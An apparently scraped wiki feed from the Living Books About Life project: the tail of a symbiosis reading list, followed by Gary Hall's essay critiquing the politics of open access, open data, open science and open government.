; Stephen B. Scharper : [http://books.google.co.uk/books?id=-h4UqAHe4MMC&amp;amp;lpg=PA53&amp;amp;ots=vVwmgq055Q&amp;amp;dq=james%20lovelock%20gaia%20symbiosis&amp;amp;lr&amp;amp;pg=PA53#v=onepage&amp;amp;q=james%20lovelock%20gaia%20symbiosis&amp;amp;f=false The Gaia Hypothesis. The world as a living organism]&lt;br /&gt;
; Timothy Morton : [http://itunes.apple.com/gb/itunes-u/literature-environment-fall/id399641376 Lynn Margulis, Symbiosis, Ethics] Track 30 of Literature and the Environment&lt;br /&gt;
; Lynn Margulis, Stephen Buhner and John Seed : Activism, Deep Ecology &amp;amp; the Gaian Era&lt;br /&gt;
&amp;lt;youtube&amp;gt;Zc99ikb3KXY&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Media Ecologies ===&lt;br /&gt;
; Matthew Fuller : [http://mitpress.mit.edu/books/chapters/026256226Xintro1.pdf Media Ecologies ] &lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Posthumanism ==&lt;br /&gt;
=== Human/Machine Symbiosis ===&lt;br /&gt;
; J.C.R. Licklider : [http://memex.org/licklider.pdf Man-Computer symbiosis] &lt;br /&gt;
; Gerwin Schalk : [http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2722922/ Brain-Computer Symbiosis] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;oLalkcMDCwg&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Symbiotic Intelligence===&lt;br /&gt;
; David E. Moriarty and Risto Miikkulainen : [http://nn.cs.utexas.edu/?moriarty:ec97 Forming Neural Networks Through Efficient and Adaptive Coevolution]&lt;br /&gt;
; Norman L. Johnson and S. Rasmussen: [http://collectivescience.com/deeper_overview.html Symbiotic Intelligence and the Internet: A Deeper Overview]&lt;br /&gt;
&lt;br /&gt;
===Human-animal hybrids, chimeras and symbiosis ===&lt;br /&gt;
; Anant Bhan, Peter A Singer, and Abdallah S Daar : [http://biomedcentral.com/content/pdf/1472-698X-10-8.PDF Human-animal chimeras for vaccine development: an endangered species or opportunity for the developing world?] &lt;br /&gt;
&lt;br /&gt;
=== Machinic assemblages: Bugs, machines and viruses ===&lt;br /&gt;
; Susan Schuppli : [http://www.cosmosandhistory.org/index.php/journal/article/download/103-222-1-PB.PDF Of Mice Moths and Men Machines] &lt;br /&gt;
; Jussi Parikka : [http://four.fibreculturejournal.org/fcj-019-digital-monsters-binary-aliens-%E2%80%93-computer-viruses-capitalism-and-the-flow-of-information/ Digital Monsters, Binary Aliens – Computer Viruses, Capitalism and the Flow of Information] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;XwpHhkXnWeA&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Augmentation ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;VCYrW-G9Y6I&amp;lt;/youtube&amp;gt;&lt;br /&gt;
; Justin C. Sanchez, Babak Mahmoudi, Jack DiGiovanna, Jose C. Principe : [http://www.bme.miami.edu/nrg/publications/journal/journal%2019.pdf Exploiting co-adaptation for the design of symbiotic neuroprosthetic assistants]&lt;br /&gt;
; Mitchell Whitelaw : [http://www.hostprods.net/text/symbiotic-circuits/ Andy Gracie: Symbiotic Circuits] &lt;br /&gt;
; Melinda Rackham : [http://www.culturemachine.net/index.php/cm/article/view/291/276 Carrier becoming symborg]&lt;br /&gt;
; Melinda Rackham and Damien Everett : [http://collection.eliterature.org/1/works/rackham_everett__carrier_becoming_symborg.html Carrier (becoming symborg)]&lt;br /&gt;
; Christian Bök : [http://www.law.ed.ac.uk/ahrc/script-ed/vol5-2/editorial.asp The Xenotext Experiment]&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Symbiosis/Attributions Attributions] ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book ==&lt;br /&gt;
; [http://livingbooksaboutlife.org/pdfs/bookarchive/Symbiosis.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5508</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5508"/>
		<updated>2013-11-19T09:15:41Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a&amp;amp;nbsp; point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts - to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibb’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; ''What Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these language whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon.This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]in the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’”] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, a much clearer understanding is needed than has been displayed by many open data/open government advocates to date of what exactly is meant by openness, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available goes along with Article 19 of The Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and against the authoritarian censorship and suppression of free speech and online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even if it was before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al, 2007: 27-28). Certainly, in the UK today, the 'truth is that the [UK] FOI Act [2000] isn't used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It's used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support the making of government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: for example, in the context of UK higher education, it is evident in the emphasis placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need to make difficult policy decisions about what data and what information it is right to publish online and what to keep secret at all. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million plus people who have purchased a Kindle, and helped the sale of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer - but not academic researchers or the public - to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply governments and law enforcement agencies such as the NSA in the US and GCHQ in the UK with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided the Google technology company with a host of network data and digital traces it can both monetize and give to the police as a result of having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google should seem somewhat farfetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don't ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. (Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all pervasive it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today - and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic vehicle number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. ((Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Transparency?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Before going any further, I should perhaps confess that I am a staunch advocate of open access in the humanities. Nevertheless, there are a number of issues that need to be raised with regard to making research and data openly available online for free. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The first point to make in this respect is that, far from revealing any hitherto unknown, hidden or secret knowledge, such discourses of openness and transparency are themselves often not very open or transparent. Staying with the relationship between politics and science, let us take as an example the response of Ed Miliband, leader of the UK’s Labour Party, to the [http://en.wikipedia.org/wiki/Climatic_Research_Unit_email_controversy 'Climategate']controversy, in which climate skeptics alleged that emails hacked from the University of East Anglia’s Climatic Research Unit revealed that scientists have tampered with the data in order to support the theory that global warming is man-made. Miliband’s answer was to advocate ‘[http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame maximum transparency]– let’s get the data out there’, he urged. ‘The people who believe that climate change is happening and is man-made have nothing to fear from transparency’ (Miliband, quoted in Westcott, 2009: 7; cited by Birchall,&amp;amp;nbsp;2011b). Yet, actually, complete transparency is impossible. This is because, as Clare Birchall has shown, there is an aporia at the heart of any claim to transparency. ‘For transparency to be known as transparency, there must be some agency (such as the media [or politicians, or government]) that legitimizes it as transparent, and because there is a legitimizing agent which does not itself have to be transparent, there is a limit to transparency’ (Birchall,&amp;amp;nbsp;2011a: 142). In fact, the more transparency is claimed, the more the violence of the mediating agency of this transparency is concealed, forgotten or obscured. Birchall offers the example of ‘The Daily Telegraph and its exposure of MPs’ expenses during the summer of 2009. While appearing to act on the side of transparency, as a commercial enterprise the paper itself has in the past been subject to secret takeover bids and its former owner, Lord Conrad Black, convicted of fraud and obstructing justice’ (Birchall,&amp;amp;nbsp;2011a: 142). To paraphrase a question from Lyotard I am going to return to at more length: Who decides what transparency is, and who knows what needs to be transparent (1986: 9)? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Furthermore, merely making such information and data available to the public online will not in itself necessarily change anything. In fact, such processes have often been adopted precisely as a means of avoiding change. Aaron Swartz provides the example of Watergate: ‘[http://www.aaronsw.com/weblog/usefultransparency after Watergate], people were upset about politicians receiving millions of dollars from large corporations. But, on the other hand, corporations seem to like paying off politicians. So instead of banning the practice, Congress simply required that politicians keep track of everyone who gives them money and file a report on it for public inspection’ (Swartz, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Openness?''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Much the same can be said for the idea that making research and data accessible to the public supposedly helps to make society more open and free. Take the belief we saw expressed above by Hilary Clinton: that people in the United States have free access to the internet while those in China and Iran do not. Those of us who live and work in the West do indeed have a certain freedom to publish and search online. Yet none of this rhetoric about freedom and transparency prevented the Obama government from condemning Wikileaks in November 2010 as [http://www.msnbc.msn.com/id/40405589/ns/us_news-security ‘reckless and dangerous’], after it opened up access to hundreds of thousands of classified State Department documents (Gibbs, 2010); nor from putting pressure on Amazon and other companies to stop hosting the whistle-blowing website, an action which had echoes of the dispute over censorship between Google and the Chinese government earlier in 2010. (Significantly, the Obama administration has also recently withdrawn the bulk of funding from the United States open government website www.data.gov, which served as an influential precursor to the previously mentioned [http://www.data.gov.uk www.data.gov.uk] website in the UK.) Furthermore, unless you are a large political or economic actor, or one of the lucky few, the statistics show that what you publish online is unlikely to receive much attention. Just ‘three companies – Google, Yahoo! and Microsoft – handle 95 percent of all search queries’; while ‘for searches containing the name of a specific political organisation, Yahoo! and Google agree on the top result 90 percent of the time’ (Hindman, 2009: 59, 79). Meanwhile, one company, Google, reportedly has 65&amp;amp;nbsp;% of the world’s search market, ‘72 per cent share of the US search market, and almost 90 per cent in the UK’ – a degree of domination that has led the European Union to investigate Google for abusing its power to favour its own products while suppressing those of rivals (Arthur, 2010: 3). 